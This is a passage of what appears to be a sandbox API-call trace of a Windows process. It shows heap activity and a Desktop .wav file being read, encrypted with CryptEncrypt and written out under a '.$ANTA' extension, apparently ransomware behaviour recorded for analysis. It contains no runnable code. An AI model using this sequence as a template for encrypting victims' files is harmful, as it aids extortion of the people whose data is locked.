hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0127.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0127.255] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0127.256] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0127.256] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0127.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wmwtjgfci6q-91k75wqc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0127.256] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.256] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0127.256] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0127.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0127.257] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0127.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0127.257] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0127.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0127.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0127.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0127.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0127.257] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\wmwtjgfci6q-91k75wqc.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0127.258] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0127.258] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0127.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b84020 [0127.262] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0127.262] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xdae9, lpOverlapped=0x0) returned 1 [0127.264] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0127.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0127.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xdae9) returned 0x49aa010 [0127.268] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0127.268] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0127.268] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0127.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0127.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0127.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0127.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0127.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0127.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0127.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0127.269] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0127.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0127.270] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0127.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0127.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0127.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caaa8 [0127.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0127.270] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xdae9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xdaf0) returned 1 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0127.270] CharLowerBuffW (in: lpsz="byte[56049]", cchLength=0xb | out: lpsz="byte[56049]") returned 0xb [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0127.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0127.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0127.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cadd8 [0127.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0127.271] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d30f8*, pdwDataLen=0x144e790*=0xdae9, dwBufLen=0xdaf0 | out: pbData=0x49d30f8*, pdwDataLen=0x144e790*=0xdaf0) returned 1 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0127.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0127.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0127.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0127.272] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0127.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0127.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.272] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xdaf0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0xdaf0, lpOverlapped=0x0) returned 1 [0127.274] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0127.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0127.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0127.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0127.274] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0127.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0127.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 